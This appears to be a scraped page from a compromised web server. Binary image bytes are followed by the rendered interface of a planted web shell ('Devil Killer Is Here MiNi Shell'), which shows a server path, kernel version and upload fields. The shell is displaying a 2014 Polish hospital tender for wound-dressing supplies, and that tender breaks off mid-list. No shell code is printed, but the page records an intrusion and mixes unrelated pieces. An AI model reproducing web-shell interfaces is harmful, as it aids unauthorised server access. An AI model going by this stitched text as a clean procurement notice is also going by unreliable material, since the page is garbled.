JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140701/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140701/141065-N-2014.html

<p class="kh_header"><b>Gdynia: Sukcesywne dostawy materiałów opatrunkowych</b><br>
<b>Numer ogłoszenia: 141065 - 2014; data zamieszczenia: 01.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Św. Wincentego a Paulo Spółka z o.o. , ul. Wójta Radtkego 1, 81-348 Gdynia, woj. pomorskie, tel. 58 6207501, faks 58 6201114.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpitalwincentego.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spólka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy materiałów opatrunkowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem niniejszego zamówienia są sukcesywne dostawy materiałów opatrunkowych dla Szpitala Św. Wincentego a Paulo Sp. z o.o. z siedzibą w Gdyni. 
2.	Szczegółowy opis przedmiotu zamówienia, zestawienie wymaganych parametrów granicznych i ocennych oraz ilości poszczególnego asortymentu zawiera załącznik nr 1 b do SIWZ.
3.	Zamawiający informuje, iż ilości asortymentu stanowiącego przedmiot zamówienia są wartościami szacunkowymi, służącymi do prawidłowego skalkulowania ceny oferty, porównania ofert i wyboru oferty najkorzystniejszej. Ilość zamawianego asortymentu, w ramach realizacji umowy może ulec zmniejszeniu lub zwiększeniu, w poszczególnych grupach asortymentowych do 25 % (słownie: dwadzieścia pięć procent), w zależności od rzeczywistych potrzeb Zamawiającego, z zastrzeżeniem, iż wartość oferty wybranego Wykonawcy nie zostanie przekroczona.
4.	Wykonawca zapewni na własny koszt dostawę do siedziby Zamawiającego, Szpitala Św. Wincentego a Paulo Sp. z o.o. z siedzibą w Gdyni, ul. Wójta Radtkego 1.
5.	Zamawiający wymaga, aby asortyment oferowany w niniejszym postępowaniu o udzielenie zamówienia publicznego, w zakresie składanej oferty spełniał warunki i posiadał niezbędne oznakowanie, certyfikaty, deklaracje zgodności wprowadzające do obrotu i używania na terytorium państwa członkowskiego, o których mowa w ustawie z dnia 20 maja 2010 r. o wyrobach medycznych (tj. Dz. U. z 2010 r. Nr 107, poz. 679. z późn. zm.).
6.	Wykonawca będzie zobowiązany wykonywać zamówienie zgodnie z niniejszą SIWZ, zawartą umową i ofertą przetargową.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 17.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga zabezpieczenia ofert wadium</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia spełniania przez oferowane dostawy wymagań określonych przez Zamawiającego, wykonawcy składają wraz z ofertą:
1)	ulotki informacyjne pochodzące od producenta oferowanego asortymentu wraz z fotografią (rysunkiem), zawierające informacje niezbędne dla oceny oferowanego asortymentu, pod kątem jego zgodności z SIWZ;
2)	 próbki wyrobów - dotyczy Grupy 1, poz. 2 - 7, Grupy 4, poz. 1-7, Grupy 5, poz. 1- 17, Grupy 15 -   po 1 opakowaniu w oryginalnym opakowaniu handlowym, gotowe do użycia w warunkach szpitalnych, opatrzone etykietą zawierającą wszystkie niezbędne dla wyrobu medycznego dane zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 3 listopada 2004 r. w sprawie wymagań zasadniczych dla wyrobów medycznych do różnego przeznaczenia (Dz. U. Nr 251, poz. 2514). Z chwilą rozstrzygnięcia postępowania Zamawiający zwróci próbki na pisemny wniosek wykonawcy, natomiast próbki wykonawcy, który został wybrany, zostaną ujęte na poczet całościowej dostawy.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiany zawartej umowy będą wymagały pisemnego aneksu, w zakresie ustalonym w załączonym do SIWZ wzorze umowy. Istotne zmiany umowy w stosunku do treści oferty, na podstawie której wyłoniono wykonawcę, mogą dotyczyć:
1)	wynagrodzenia wykonawcy, 
2)	częstotliwości dostaw, miejsca dostaw,
3)	zmiany cen asortymentu wskazanego w umowie,
4)	zmiany nazwy produktu przy zachowaniu jego parametrów w sytuacji, gdy produkt zostanie wycofany z produkcji, lub wprowadzony do sprzedaży przez producenta produkt zmodyfikowany- udoskonalony, przy czym zmiana ta nie może powodować wzrostu ceny zawartej w ofercie,
5)	upadłości albo likwidacji producenta lub dystrybutora,
6)	wydłużenia terminu obowiązywania umowy, w sytuacji nie zrealizowania całego asortymentu będącego przedmiotem umowy w pierwotnym terminie. 
2.	Zmiany, o których mowa w ust. 2mogą być dokonane w następujących przypadkach:
1) ustawowej zmiany stawki podatku od towarów i usług (VAT),  przy czym zmianie ulegną wyłącznie ceny jednostkowe brutto, natomiast ceny jednostkowe netto pozostaną bez zmian;
7)	w zakresie, o którym mowa w ust. 2 pkt. 3, w przypadku:
a)	zmian wprowadzonych przez producentów, obniżki marży;
b)	zmian kursu waluty w przypadku towarów importowanych, zgodnie z tabelą NBP;
8)	w przypadku zmiany przepisów prawa mających wpływ na warunki umowy;
9)	jeżeli zmiany nie spowodują negatywnych konsekwencji dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitalwincentego.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Św.Wincentego
a Paulo Sp. z o.o. z siedzibą w Gdyni, ul. Wójta Radtkego 1, 81 - 348 Gdynia, Dział Zamowień
Publicznych, bud. gospodarczy, pok. nr 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.07.2014 godzina 10:00, miejsce: Szpital Św.Wincentego
a Paulo Sp. z o.o. z siedzibą w Gdyni, ul. Wójta Radtkego 1, 81 - 348 Gdynia, Dział Zamowień
Publicznych, bud. gospodarczy, pok. nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Grupa 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Gaza baweł., -5 000 m bieżących
2.Kompresy  gazowe niej., 10 cm x 10 cm x 100, -17 000 op.
3.Kompresy  gazowe niej., 7,5 cm x 7,5 cm x 100,-15 000 op.
4.Kompresy  gazowe niej., 5 cm x 5 cm x 100,-19 000 op.
5.Opaska gipsowa szybkowiążąca, 10 cm x 3 m,-2 000 op.
6.Opaska gipsowa szybkowiążąca, 12 cm x 3 m,-2 400 op.
7.Opaska gipsowa szybkowiążąca, 14-15 cm x 3 m,-4 000 op.
8.Jałowy kompres włókninowy 5 cm x 5 cm, -255.000 szt.
9.Bandaż podgipsowy z waty syntetycznej, 6 cm x 3 m,-500 szt.
10.Bandaż podgipsowy z waty syntetycznej,10 cm x 3 m,-4 500 szt.
11.Bandaż podgipsowy z waty syntetycznej,15 cm x 3 m,-5 000 szt.
12.Bandaż podgipsowy z waty syntetycznej,25 cm x 3 m,-500 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Grupa 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przylepny opatrunek hydrowłóknistym opartym na Technologii Hydrofiber, składa się z trzech warstw: wewnętrznej warstwy wykonanej w Technologii Hydrofiber, warstwy kontaktowej z włókniny z hydrowłókien (karboksymetyloceluloza) oraz powłoki poliuretanowej, a dodatkowo ma samoprzylepny brzeg pokryty delikatnym hydrokoloidowym klejem Betahesive o rozmiarach:10 x 10 cm,-100 szt.
14 x 14 cm,-100 szt.
19 x 19 cm,-100 szt.
22 x 22 cm,-100 szt.
na piętę   18,5 x 20,5 cm,-200 szt.
na kość krzyżową 25 x 21 cm,-100 szt.
2. Opatrunek hydrowłóknisty produkowany technologią hydrofiber
-10x10 cm - 100 szt.
- 15x15 cm -100 szt.
3.Opatrunek   przeciwbakteryjny
- 10x10 cm -150 szt.
- 15x15 cm -50 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Grupa 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Wata opatrunkowa o składzie:70% bawełny i 30% wiskozy,500 g,,-900 op.
2.Wata opatrunkowa o składzie: 70% bawełny i  30% wiskozy,200 g, -60 op.

3.Wata 100% bawełny,200 g,-80 op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Grupa 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Opaska dziana, wiskozowa,
15 cm x 4 m,-
5 000 szt.
2.Opaska elastyczna, 
15 cm x 5 m,-
4 000 szt.
3.Opaska elastyczna, 
12 cm x 5 m,-
5 000 szt.
4.Opaska dziana bardzo elastyczna, 
12 cm x 4m,-
60 000 szt.
5.Opaska dziana bardzo elastyczna, 
10 cm x 4 m,-
70 000 szt.
6.Elastyczna opaska podtrzymująca o właściwościach kohezyjnych,
10 cm x 20 m,-
220 szt.
7.Elastyczna opaska podtrzymująca o właściwościach kohezyjnych,
12 cm x 20 m,-
250 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Grupa 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przylepiec hypoalergiczny,
5 cm x 5 m,-
2 500 szt.
2.Przylepiec hypoalergiczny,
2,5 cm x 5 m,-
1 500 szt.
3.Przylepiec hypoalergiczny,
2,5 cm x 9,14-9,2 m,-
5 000 szt.
4.Przylepiec hypoalergiczny,
1,25 cm x 9,14-9,2 m,-
1 200 szt.
5.Przylepiec hypoalergiczny,
2,5 cm x 9,14-9,2 m,-
1 500 szt.
6.Przylepiec hypoalergiczny,
5 cm x 9,14-9,2 m,-
1 200 szt.
7.Plaster opatrunkowy z włókniny,,
8 cm x 5 m,-
200 szt.
8.Przylepiec do łączenia brzegów ran
 3 mm x 75-76 mm,-
1 000 koperta        po 5 szt.
9.Sterylny opatrunek z włókniny przepuszczającej powietrze i parę wodną,,
5-6 cm x 7-8 cm,-
105 000 szt.
10.Przylepiec elastyczny z klejem nie wywołującym odczynów skórnych,
5 cm x 10 m,-
600 szt.
11.Przylepiec elastyczny z klejem nie wywołującym odczynów skórnych ,
10 cm x 10 m,-
900 szt.
12.Przylepiec elastyczny z klejem nie wywołującym odczynów skórnych,
15 cm x 10 m,-
600 szt.
13.Przylepiec elastyczny z klejem nie wywołującym odczynów skórnych,
20 cm x 10 m,-
150 szt.
14.Przylepiec elastyczny z klejem nie wywołującym odczynów skórnych,
30 cm x 10 m,-
80 szt.
15.Jałowy opatrunek samoprzylepny na ranę z wkładem chłonnym,
od 8-10 cm do 10-12 cm,-
20 000 szt.
16.Jałowy opatrunek samoprzylepny na ranę z wkładem chłonnym,
od 8-10 cm do 15-18 cm,-
17 000 szt.
17.Jałowy opatrunek samoprzylepny na ranę z wkładem chłonnym,
od 8-10 cm do 20-25 cm,-
5 000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Grupa 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Jałowy kompres z siatki hydrofobowej poliamidowej impregnowanej maścią z trójglicerydów, zawierający srebro metaliczne,
5 cm x 5 cm,-
300 szt.
2.Jałowy kompres z siatki hydrofobowej poliamidowej impregnowanej maścią                                    z trójglicerydów, zawierający srebro metaliczne,
10 cm x 10 cm,-
1 200 szt.
3.Jałowy kompres z siatki hydrofobowej poliamidowej impregnowanej maścią                                    z trójglicerydów, zawierający srebro metaliczne,
10 cm x 20 cm,-
500 szt.
4.Samoprzylepny opatrunek hydrokoloidowy,
7,5 cm x 7,5 cm,-
200 szt.
5.Samoprzylepny opatrunek hydrokoloidowy,
10 cm x 10 cm,-
   4 800 szt.
6.Samoprzylepny opatrunek hydrokoloidowy,
15 cm x 15 cm,-
500 szt.
7.Samoprzylepny opatrunek hydrokoloidowy,
20 cm x 20 cm,-
300 szt.
8.Samoprzylepny opatrunek hydrokoloidowy,
10 cm x 10 cm,-
200 szt.
9.Sterylny opatrunek z włókien alginianów wapnia,
10 cm x 10 cm,-
4 000 szt.
10.
Sterylny opatrunek dla ran wymagających aktywnego oczyszczenia przez 24h za pomocą płynu Ringera,-
7,5 cm x 7,5 cm,
   500 szt.
11.
Sterylny opatrunek dla ran wymagających aktywnego oczyszczenia przez 24h za pomocą płynu Ringera,-
10 cm x 10 cm, 
2 000 szt.
12.
Sterylny opatrunek dla ran wymagających aktywnego oczyszczenia przez 24h za pomocą płynu Ringera,
okrągły o średnicy 4 cm,-
500 szt.
13.
Sterylny opatrunek dla ran wymagających aktywnego oczyszczenia przez 24h za pomocą płynu Ringera,
okrągły o średnicy         5,5 cm,-
500 szt.
14.
Jałowy kompres z siatki bawełnianej,
7,5 cm x 10 cm,-
200 szt.
15.
Jałowy kompres z siatki bawełnianej,
10 cm x 10 cm,-
500 szt.
16.
Jałowy super chłonny kompres składający się            z 4 warstw,
10 cm x 10 cm,-
50 szt.
17.
Jałowy super chłonny kompres składający się            z 4 warstw,
10 cm x 20 cm,-
50 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Grupa 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Lignina arkusze,-
8 000 kg.
2.Lignina rolki,
150g -
50 op.
3.Kompresy z waty celulozowej w rolce typu Pur-Zellin,
40 mm x 50 mm             x 500 szt.,
300 op. (1x500szt)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> grupa 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylny samoprzylepny opatrunek z folii poliuretanowej z wycięciem do   zabezpieczenia kaniul, 7 cm x 9 cm -20.000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Grupa 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Chustka trójkątna,-
2 000 szt.

2.Opaski bawełniane tkane,
15 cm x 4 m,-
400 szt.
3.Opaski bawełniane tkane,
10 cm x 4 m,-
200 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Grupa 10.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Opatrunek parafinowy nasączony chlorheksydyną wyjałowiony,
10 cm x 10 cm,-
600 szt.

2.Opatrunek parafinowy nasączony chlorheksydyną wyjałowiony,
15 cm x 20 cm,-
500 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Grupa 11.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Kompresy niejałowe z gazy 17 nitkowe, 12 warstwowe,
9 cm x 9 cm x 500 szt.-
500 op.

2.Kompresy z wkładem bibułkowym chłonnym,
7,5 cm x 15 cm x 100 szt.-

1 300 op.

3.Tupfery z gazy 17 nitkowe, z nitką RTG,
15 cm x 15 cm x 100 szt.-

700 op.

4.Kule z gazy 17 nitkowe, z nitką RTG,
30 cm x 30 cm x 50 szt.-

4 500 op.

5.Tupfery z gazy 17 nitkowe, z nitką RTG,
26 cm x 82 cm x 25 szt.-

1 500 op.

6.Tupfery z gazy 17 nitkowe, z nitką RTG,
20 cm x 20 cm x 250 szt.-
 
  100 op.

7.Setony z gazy 17 nitkowe - niejałowe,
1 cm x 2 m-

2 000 szt.

8.Setony z gazy 17 nitkowe - niejałowe,
2 cm x 2 m-
    
500 szt.
9.Setony z gazy 17 nitkowe - niejałowe,
5 cm x 2 m-

